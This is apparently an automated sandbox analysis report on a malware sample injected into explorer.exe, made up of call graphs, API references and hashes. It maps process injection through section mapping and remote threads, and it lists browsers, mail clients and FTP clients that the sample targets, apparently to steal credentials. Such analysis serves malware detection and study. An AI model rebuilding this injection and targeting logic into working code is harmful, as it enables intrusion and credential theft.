                                                                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                        • Instruction ID: 264686b8a3205558d5275380e21c4bc67fa738683c4cb186f0059383a4edd806
                                                                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                        • Instruction Fuzzy Hash: 5CF0E57021571A8FE7486FB844A8336F5D0FB18319F18463EE46AC23D0D77888428702

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 251 1d22b4-1d22c6 252 1d22c8-1d22d0 CreateStreamOnHGlobal 251->252 253 1d22d6-1d22e6 251->253 252->253
                                                                        APIs
                                                                        • CreateStreamOnHGlobal.COMBASE ref: 001D22D0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CreateGlobalStream
                                                                        • String ID:
                                                                        • API String ID: 2244384528-0
                                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                        • Instruction ID: 90f727c0e57445b95457ab55e376c8520b97de21b185cfb7d751038cfe3d5542
                                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                        • Instruction Fuzzy Hash: 50E08C30108B0A8FD758AFBCE4CA07A33A1EBAC252B05053FE005CB114D27988C18741

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 254 1d298c-1d2997 255 1d2999-1d299c 254->255 256 1d29b5 254->256 255->256 257 1d299e-1d29a7 GetFileAttributesW 255->257 258 1d29b7-1d29bc 256->258 259 1d29a9-1d29af 257->259 260 1d29b1-1d29b3 257->260 259->260 260->258
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE ref: 001D299E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                        • Instruction ID: c92bfb55fac26fb4ccd0511eb5877d43910f68b3fb52d136159fb6de357868a1
                                                                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                        • Instruction Fuzzy Hash: 1CD05E22612915076B6C26F908E927120A0D73932EB94022BEA36C13A0E3A5C895A201

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 1d1860-1d1870 call 1d1ad4 264 1d1886-1d188b 261->264 265 1d1872-1d1880 RtlFreeHeap 261->265 265->264
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2874598553.00000000001D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D1000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                        • Instruction ID: 40d4adad595331773e2bc96fd1c17638c7bb9a22ed4221692365951983957922
                                                                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                        • Instruction Fuzzy Hash: 23D01224716A042BEF2CBBFE2C8D1747AD2E768212B588066B819C3352EE3DC895C341

                                                                        Execution Graph

                                                                        Execution Coverage:10.3%
                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                        Signature Coverage:17.3%
                                                                        Total number of Nodes:306
                                                                        Total number of Limit Nodes:42
                                                                        execution_graph 985 b41425 986 b41432 985->986 987 b4144b 985->987 988 b42608 VirtualQuery 986->988 989 b4143a 988->989 989->987 990 b41493 23 API calls 989->990 990->987 991 b41eb6 992 b41ecc lstrlen 991->992 993 b41ed9 991->993 992->993 1002 b42861 GetProcessHeap RtlAllocateHeap 993->1002 995 b41ee1 lstrcat 996 b41f16 lstrcat 995->996 997 b41f1d 995->997 996->997 1003 b41f4a 997->1003 1000 b42843 3 API calls 1001 b41f40 1000->1001 1002->995 1037 b422b8 1003->1037 1007 b41f77 1042 b427e2 lstrlen MultiByteToWideChar 1007->1042 1009 b41f86 1043 b42374 RtlZeroMemory 1009->1043 1012 b41fd8 RtlZeroMemory 1015 b4200d 1012->1015 1013 b42843 3 API calls 1014 b41f2d 1013->1014 1014->1000 1016 b4229a 1015->1016 1020 b4203b 1015->1020 1045 b422e5 1015->1045 1016->1013 1018 b42280 1018->1016 1019 b42843 3 API calls 1018->1019 1019->1016 1020->1018 1054 b42861 GetProcessHeap RtlAllocateHeap 1020->1054 1022 b4210b wsprintfW 1023 b42131 1022->1023 1027 b4219e 1023->1027 1055 b42861 GetProcessHeap RtlAllocateHeap 1023->1055 1025 b4216b wsprintfW 1025->1027 1026 b4225d 1028 b42843 3 API calls 1026->1028 1027->1026 1056 b42861 GetProcessHeap RtlAllocateHeap 1027->1056 1030 b42271 1028->1030 1030->1018 1031 b42843 3 API calls 1030->1031 1031->1018 1032 b42256 1034 b42843 3 API calls 1032->1034 1033 b421e9 1033->1032 1057 b42815 VirtualAlloc 1033->1057 1034->1026 1036 b42243 RtlMoveMemory 1036->1032 1038 b41f69 1037->1038 1039 b422c2 1037->1039 1041 b42861 GetProcessHeap RtlAllocateHeap 1038->1041 1040 b426e6 2 API calls 1039->1040 1040->1038 1041->1007 1042->1009 1044 b41f96 1043->1044 1044->1012 1044->1016 1047 b422f2 1045->1047 1049 b42353 1045->1049 1046 b422f6 DnsQuery_W 1046->1047 1047->1046 1048 b42335 DnsFree inet_ntoa 1047->1048 1047->1049 1048->1047 1050 b42355 1048->1050 1049->1020 1058 b42861 GetProcessHeap RtlAllocateHeap 1050->1058 1052 b4235f 1059 b427e2 lstrlen MultiByteToWideChar 1052->1059 1054->1022 1055->1025 1056->1033 1057->1036 1058->1052 1059->1049 1060 b42806 VirtualFree 707 b41000 708 b41007 707->708 709 b41010 707->709 711 b41016 708->711 760 b42608 VirtualQuery 711->760 714 b41097 714->709 716 b4102c RtlMoveMemory 717 b41071 NtUnmapViewOfSection GetCurrentProcessId 716->717 718 b4104d 716->718 719 b41092 717->719 720 b4109e 717->720 797 b42861 GetProcessHeap RtlAllocateHeap 718->797 719->714 722 b41095 719->722 763 b410a4 720->763 798 b41332 722->798 724 b41052 RtlMoveMemory 724->717 725 b410a3 727 b42861 GetProcessHeap RtlAllocateHeap 725->727 728 b410cc 727->728 729 b410dc CreateToolhelp32Snapshot 728->729 730 b410f0 Process32First 729->730 731 b41322 Sleep 729->731 732 b4110c lstrcmpiA 730->732 733 b4131b CloseHandle 730->733 731->729 734 b41124 lstrcmpiA 732->734 735 b41280 732->735 733->731 734->735 736 b41138 lstrcmpiA 734->736 737 b425ad OpenProcess IsWow64Process IsWow64Process CloseHandle 735->737 739 b41305 Process32Next 735->739 749 b42608 VirtualQuery 735->749 752 b412ae lstrcmpiA 735->752 756 b41819 30 API calls 735->756 736->735 738 b4114c lstrcmpiA 736->738 737->735 738->735 740 b41160 lstrcmpiA 738->740 739->732 741 b41319 739->741 740->735 742 b41170 lstrcmpiA 740->742 741->733 742->735 743 b41184 lstrcmpiA 742->743 743->735 744 b41198 lstrcmpiA 743->744 744->735 745 b411ac lstrcmpiA 744->745 745->735 746 b411c0 lstrcmpiA 745->746 746->735 747 b411d4 lstrcmpiA 746->747 747->735 748 b411e8 lstrcmpiA 747->748 748->735 750 b411fc lstrcmpiA 748->750 749->735 750->735 751 b4120c lstrcmpiA 750->751 751->735 753 b4121c lstrcmpiA 751->753 752->735 753->735 754 b4122c lstrcmpiA 753->754 754->735 755 b4123c lstrcmpiA 754->755 755->735 757 b4124c lstrcmpiA 755->757 756->735 757->735 758 b4125c lstrcmpiA 757->758 758->735 759 b4126c lstrcmpiA 758->759 759->735 759->739 761 b4101e 760->761 761->714 762 b42861 GetProcessHeap RtlAllocateHeap 761->762 762->716 825 b42861 GetProcessHeap RtlAllocateHeap 763->825 765 b410cc 766 b410dc CreateToolhelp32Snapshot 765->766 767 b410f0 Process32First 766->767 768 b41322 Sleep 766->768 769 b4110c lstrcmpiA 767->769 770 b4131b CloseHandle 767->770 768->766 771 b41124 lstrcmpiA 769->771 772 b41280 769->772 770->768 771->772 773 b41138 lstrcmpiA 771->773 776 b41305 Process32Next 772->776 786 b42608 VirtualQuery 772->786 789 b412ae lstrcmpiA 772->789 826 b425ad OpenProcess 772->826 832 b41819 772->832 773->772 775 b4114c lstrcmpiA 773->775 775->772 777 b41160 lstrcmpiA 775->777 776->769 778 b41319 776->778 777->772 779 b41170 lstrcmpiA 777->779 778->770 779->772 780 b41184 lstrcmpiA 779->780 780->772 781 b41198 lstrcmpiA 780->781 781->772 782 b411ac lstrcmpiA 781->782 782->772 783 b411c0 lstrcmpiA 782->783 783->772 784 b411d4 lstrcmpiA 783->784 784->772 785 b411e8 lstrcmpiA 784->785 785->772 787 b411fc lstrcmpiA 785->787 786->772 787->772 788 b4120c lstrcmpiA 787->788 788->772 790 b4121c lstrcmpiA 788->790 789->772 790->772 791 b4122c lstrcmpiA 790->791 791->772 792 b4123c lstrcmpiA 791->792 792->772 794 b4124c lstrcmpiA 792->794 794->772 795 b4125c lstrcmpiA 794->795 795->772 796 b4126c lstrcmpiA 795->796 796->772 796->776 797->724 878 b42861 GetProcessHeap RtlAllocateHeap 798->878 800 b41340 GetModuleFileNameA 879 b42861 GetProcessHeap RtlAllocateHeap 800->879 802 b41357 GetCurrentProcessId wsprintfA 880 b4263e CryptAcquireContextA 802->880 805 b4139c Sleep 885 b424d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 805->885 806 b4140d 903 b42843 806->903 810 b413ae GetModuleHandleA GetProcAddress 812 b413c9 810->812 813 b413da GetModuleHandleA GetProcAddress 810->813 811 b42843 3 API calls 816 b4141b RtlExitUserThread 811->816 893 b41de3 812->893 814 b413f5 813->814 815 b41406 813->815 818 b41de3 3 API calls 814->818 819 b424d5 10 API calls 815->819 820 b41425 816->820 818->815 819->806 821 b4144b 820->821 822 b42608 VirtualQuery 820->822 821->720 823 b4143a 822->823 823->821 908 b41493 823->908 825->765 827 b42600 826->827 828 b425cb IsWow64Process 826->828 827->772 829 b425ee 828->829 830 b425dc IsWow64Process 828->830 831 b425f9 CloseHandle 829->831 830->829 830->831 831->827 833 b42608 VirtualQuery 832->833 834 b41833 833->834 835 b41845 OpenProcess 834->835 836 b41a76 834->836 835->836 837 b4185e 835->837 836->772 838 b42608 VirtualQuery 837->838 839 b41865 838->839 839->836 840 b41873 NtSetInformationProcess 839->840 841 b4188f 839->841 840->841 863 b41a80 841->863 844 b41a80 2 API calls 846 b418d6 844->846 845 b41a73 CloseHandle 845->836 846->845 847 b41a80 2 API calls 846->847 848 b41900 847->848 869 b41b17 848->869 851 b41a80 2 API calls 852 b41930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 851->852 853 b41985 852->853 854 b41a4e CreateRemoteThread 852->854 856 b4198b CreateMutexA GetLastError 853->856 859 b419bb GetModuleHandleA GetProcAddress ReadProcessMemory 853->859 855 b41a65 CloseHandle 854->855 857 b41a67 CloseHandle CloseHandle 855->857 856->853 858 b419a7 CloseHandle Sleep 856->858 857->845 858->856 860 b41a47 859->860 861 b419ec WriteProcessMemory 859->861 860->855 860->857 861->860 862 b41a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 861->862 862->860 864 b41a94 863->864 866 b418b4 863->866 865 b41aa4 NtCreateSection 864->865 867 b41ac3 864->867 865->867 866->844 867->866 868 b41ad8 NtMapViewOfSection 867->868 868->866 870 b41b60 869->870 871 b41b2e 869->871 873 b41bc3 870->873 875 b41b71 LoadLibraryA 870->875 877 b41ba1 GetProcAddress 870->877 872 b41b30 RtlMoveMemory 871->872 872->870 872->872 874 b41910 NtUnmapViewOfSection 873->874 876 b41be1 LdrProcessRelocationBlock 873->876 874->851 875->870 875->874 876->873 876->874 877->870 877->874 878->800 879->802 881 b42664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 880->881 882 b41384 CreateMutexA GetLastError 880->882 883 b426aa wsprintfA 881->883 882->805 882->806 883->883 884 b426cc CryptDestroyHash CryptReleaseContext 883->884 884->882 886 b42515 885->886 887 b42565 CloseHandle 886->887 888 b42555 Thread32Next 886->888 889 b42521 OpenThread 886->889 887->810 888->886 890 b42544 ResumeThread 889->890 891 b4253c SuspendThread 889->891 892 b4254a CloseHandle 890->892 891->892 892->888 894 b41e56 893->894 895 b41ded 893->895 894->813 895->894 935 b41e93 VirtualProtect 895->935 897 b41e04 897->894 936 b42815 VirtualAlloc 897->936 899 b41e10 900 b41e1a RtlMoveMemory 899->900 901 b41e2d 899->901 900->901 937 b41e93 VirtualProtect 901->937 904 b42608 VirtualQuery 903->904 905 b4284b 904->905 906 b41414 905->906 907 b4284f GetProcessHeap HeapFree 905->907 906->811 907->906 909 b414c0 908->909 910 b414a1 908->910 912 b41510 909->912 913 b414c8 909->913 938 b417c7 910->938 957 b426e6 lstrlen lstrlen 912->957 915 b417c7 5 API calls 913->915 931 b414b6 913->931 919 b414e0 915->919 916 b4155f 917 b426e6 2 API calls 916->917 921 b4156c 917->921 919->931 945 b41647 919->945 924 b41584 921->924 925 b415a0 921->925 921->931 922 b41532 959 b41752 GetModuleHandleA GetProcAddress 922->959 962 b42404 lstrlen 924->962 929 b42404 5 API calls 925->929 925->931 932 b415ac 929->932 930 b41647 11 API calls 930->931 931->821 932->931 933 b41647 11 API calls 932->933 934 b414fb 933->934 934->931 968 b415e0 934->968 935->897 936->899 937->894 939 b41812 938->939 940 b417d1 938->940 939->931 940->939 941 b426e6 2 API calls 940->941 942 b417f1 941->942 942->939 973 b42861 GetProcessHeap RtlAllocateHeap 942->973 944 b41804 RtlMoveMemory 944->939 946 b41660 945->946 956 b41745 945->956 947 b41671 lstrlen 946->947 946->956 948 b41683 lstrlen 947->948 947->956 949 b41690 getpeername 948->949 948->956 950 b416ae inet_ntoa htons 949->950 949->956 951 b416cc 950->951 950->956 951->956 974 b42861 GetProcessHeap RtlAllocateHeap 951->974 953 b41717 wsprintfA 954 b4173a 953->954 955 b42843 3 API calls 954->955 954->956 955->956 956->934 958 b4151d 957->958 958->916 958->922 960 b41776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 959->960 961 b41539 959->961 960->961 961->930 961->931 963 b42456 962->963 964 b4241c CryptStringToBinaryA 962->964 963->931 964->963 965 b42438 964->965 975 b42861 GetProcessHeap RtlAllocateHeap 965->975 967 b42444 CryptStringToBinaryA 967->963 969 b42843 3 API calls 968->969 970 b415f5 969->970 971 b42843 3 API calls 970->971 972 b415fc 971->972 972->931 973->944 974->953 975->967 1061 b4245e lstrlen 1062 b424a5 1061->1062 1063 b42476 CryptBinaryToStringA 1061->1063 1063->1062 1064 b42489 1063->1064 1067 b42861 GetProcessHeap RtlAllocateHeap 1064->1067 1066 b42494 CryptBinaryToStringA 1066->1062 1067->1066 976 b47728 977 b47904 976->977 978 b4774b 976->978 977->977 979 b4785a LoadLibraryA 978->979 983 b4789f VirtualProtect VirtualProtect 978->983 980 b47871 979->980 980->978 982 b47883 GetProcAddress 980->982 982->980 984 b47899 982->984 983->977

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00B42374 1 Function_00B41EB6 12 Function_00B42861 1->12 41 Function_00B42843 1->41 43 Function_00B41F4A 1->43 2 Function_00B42731 3 Function_00B41332 5 Function_00B4263E 3->5 3->12 14 Function_00B41DE3 3->14 19 Function_00B424D5 3->19 26 Function_00B41493 3->26 3->41 42 Function_00B42608 3->42 4 Function_00B42573 6 Function_00B422B8 10 Function_00B426E6 6->10 7 Function_00B410A4 7->2 7->4 7->12 15 Function_00B425AD 7->15 24 Function_00B42592 7->24 30 Function_00B41819 7->30 7->42 8 Function_00B41425 8->26 8->42 9 Function_00B422E5 9->12 13 Function_00B427E2 9->13 11 Function_00B415E0 11->41 20 Function_00B42815 14->20 27 Function_00B41E93 14->27 28 Function_00B41E5D 14->28 37 Function_00B41DC0 14->37 16 Function_00B424AE 17 Function_00B47728 18 Function_00B41469 18->26 18->42 21 Function_00B41016 21->2 21->3 21->4 21->7 21->12 21->15 21->24 21->30 21->42 22 Function_00B41B17 23 Function_00B43417 25 Function_00B41752 26->10 26->11 26->25 32 Function_00B42404 26->32 34 Function_00B41647 26->34 35 Function_00B417C7 26->35 38 Function_00B41D80 28->38 29 Function_00B4245E 29->12 30->22 36 Function_00B41A80 30->36 30->42 31 Function_00B41C19 32->12 33 Function_00B42806 34->12 34->16 34->41 35->10 35->12 37->31 38->31 39 Function_00B41000 39->21 40 Function_00B42841 41->42 43->0 43->2 43->6 43->9 43->12 43->13 43->20 43->41

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 b41016-b41020 call b42608 3 b41097-b41098 0->3 4 b41022-b4104b call b42861 RtlMoveMemory 0->4 7 b41071-b41090 NtUnmapViewOfSection GetCurrentProcessId 4->7 8 b4104d-b4106b call b42861 RtlMoveMemory 4->8 9 b41092-b41093 7->9 10 b4109e-b410d7 call b410a4 call b42861 7->10 8->7 9->3 12 b41095-b41099 call b41332 9->12 21 b410dc-b410ea CreateToolhelp32Snapshot 10->21 12->10 22 b410f0-b41106 Process32First 21->22 23 b41322-b4132d Sleep 21->23 24 b4110c-b4111e lstrcmpiA 22->24 25 b4131b-b4131c CloseHandle 22->25 23->21 26 b41124-b41132 lstrcmpiA 24->26 27 b41280-b41289 call b425ad 24->27 25->23 26->27 28 b41138-b41146 lstrcmpiA 26->28 32 b41305-b41313 Process32Next 27->32 33 b4128b-b41294 call b42592 27->33 28->27 30 b4114c-b4115a lstrcmpiA 28->30 30->27 34 b41160-b4116a lstrcmpiA 30->34 32->24 35 b41319 32->35 33->32 41 b41296-b4129d call b42573 33->41 34->27 37 b41170-b4117e lstrcmpiA 34->37 35->25 37->27 39 b41184-b41192 lstrcmpiA 37->39 39->27 40 b41198-b411a6 lstrcmpiA 39->40 40->27 42 b411ac-b411ba lstrcmpiA 40->42 41->32 47 b4129f-b412ac call b42608 41->47 42->27 44 b411c0-b411ce lstrcmpiA 42->44 44->27 46 b411d4-b411e2 lstrcmpiA 44->46 46->27 48 b411e8-b411f6 lstrcmpiA 46->48 47->32 53 b412ae-b41300 lstrcmpiA call b42731 call b41819 call b42731 47->53 48->27 50 b411fc-b4120a lstrcmpiA 48->50 50->27 52 b4120c-b4121a lstrcmpiA 50->52 52->27 54 b4121c-b4122a lstrcmpiA 52->54 53->32 54->27 56 b4122c-b4123a lstrcmpiA 54->56 56->27 58 b4123c-b4124a lstrcmpiA 56->58 58->27 60 b4124c-b4125a lstrcmpiA 58->60 60->27 62 b4125c-b4126a lstrcmpiA 60->62 62->27 64 b4126c-b4127a lstrcmpiA 62->64 64->27 64->32
                                                                        APIs
                                                                          • Part of subcall function 00B42608: VirtualQuery.KERNEL32(00B44434,?,0000001C), ref: 00B42615
                                                                          • Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
                                                                          • Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00B41038
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00B4106B
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00B41074
                                                                        • GetCurrentProcessId.KERNEL32(?,00B41010), ref: 00B4107A
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B410DF
                                                                        • Process32First.KERNEL32(00000000,?), ref: 00B410FE
                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00B4111A
                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00B4112E
                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00B41142
                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00B41156
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B41166
                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00B4117A
                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00B4118E
                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00B411A2
                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00B411B6
                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00B411CA
                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00B411DE
                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00B411F2
                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00B41206
                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00B41216
                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00B41226
                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00B41236
                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00B41246
                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00B41256
                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00B41266
                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00B41276
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B412B4
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00B4130B
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00B4131C
                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B41327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                        • API String ID: 2555639992-1680033604
                                                                        • Opcode ID: 25345c3575dda05c95a0a615fbea6909ae72c7ddc6c51a59a247399ac645c9a6
                                                                        • Instruction ID: 04c99a0b1ab41cd8b2acd1f00d21d3abfda49a8d817c73e34f4b2b7a21f11aec
                                                                        • Opcode Fuzzy Hash: 25345c3575dda05c95a0a615fbea6909ae72c7ddc6c51a59a247399ac645c9a6
                                                                        • Instruction Fuzzy Hash: 41719330A01345ABCB10DFB49C45F6A7BECFF46B80B080AA9F940C3191DF65DB45AA79

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00B42861: GetProcessHeap.KERNEL32(00000008,0000A000,00B410CC), ref: 00B42864
                                                                          • Part of subcall function 00B42861: RtlAllocateHeap.NTDLL(00000000), ref: 00B4286B
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B410DF
                                                                        • Process32First.KERNEL32(00000000,?), ref: 00B410FE
                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00B4111A
                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00B4112E
                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00B41142
                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00B41156
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B41166
                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 00B4117A
                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 00B4118E
                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 00B411A2
                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 00B411B6
                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 00B411CA
                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 00B411DE
                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 00B411F2
                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00B41206
                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00B41216
                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00B41226
                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00B41236
                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00B41246
                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00B41256
                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00B41266
                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00B41276
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00B412B4
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00B4130B
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00B4131C
                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B41327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B41000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_b41000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                        • API String ID: 3950187957-1680033604
                                                                        • Opcode ID: ae304881ae8bee5086e7485ad3bad91c1629d655ac9bdef6ce430c75ff1a1742
                                                                        • Instruction ID: 5b9eb9413fb397074cb1fbe27022fe5110e71e401d20d87f95614f7e3b87c8c2
                                                                        • Opcode Fuzzy Hash: ae304881ae8bee5086e7485ad3bad91c1629d655ac9bdef6ce430c75ff1a1742
                                                                        • Instruction Fuzzy Hash: CC51A471A04305A6DB00DFB58C85F6F7BECAF45B80B480EA9F940C3190EF64DB45AA79

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 112 b47728-b47745 113 b4790d 112->113 114 b4774b-b47758 112->114 113->113 115 b4776a-b4776f 114->115 116 b47771 115->116 117 b47760-b47765 116->117 118 b47773 116->118 120 b47766-b47768 117->120 119 b47778-b4777a 118->119 121 b47783-b47787 119->121 122 b4777c-b47781 119->122 120->115 120->116 121->119 123 b47789 121->123 122->121 124 b47794-b47799 123->124 125 b4778b-b47792 123->125 126 b477a8-b477aa 124->126 127 b4779b-b477a4 124->127 125->119 125->124 130 b477b3-b477b7 126->130 131 b477ac-b477b1 126->131 128 b477a6 127->128 129 b4781a-b4781d 127->129 128->126 132 b47822-b47825 129->132 133 b477c0-b477c2 130->133 134 b477b9-b477be 130->134 131->130 135 b47827-b47829 132->135 136 b477e4-b477f3 133->136 137 b477c4 133->137 134->133 135->132 141 b4782b-b4782e 135->141 139 b47804-b47811 136->139 140 b477f5-b477fc 136->140 138 b477c5-b477c7 137->138 142 b477d0-b477d4 138->142 143 b477c9-b477ce 138->143 139->139 145 b47813-b47815 139->145 140->140 144 b477fe 140->144 141->132 146 b47830-b4784c 141->146 142->138 148 b477d6 142->148 143->142 144->120 145->120 146->135 147 b4784e 146->147 149 b47854-b47858 147->149 150 b477e1 148->150 151 b477d8-b477df 148->151 152 b4789f-b478a2 149->152 153 b4785a-b47870 LoadLibraryA 149->153 150->136 151->138 151->150 155 b478a5-b478ac 152->155 154 b47871-b47876 153->154 154->149 156 b47878-b4787a 154->156 157 b478d0-b47900 VirtualProtect * 2 155->157 158 b478ae-b478b0 155->158 159 b47883-b47890 GetProcAddress 156->159 160 b4787c-b47882 156->160 163 b47904-b47908 157->163 161 b478b2-b478c1 158->161 162 b478c3-b478ce 158->162 165 b47892-b47897 159->165 166 b47899-b4789c 159->166 160->159 161->155 162->161 163->163 164 b4790a 163->164 164->113 165->154
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.4138340959.0000000000B46000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B46000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
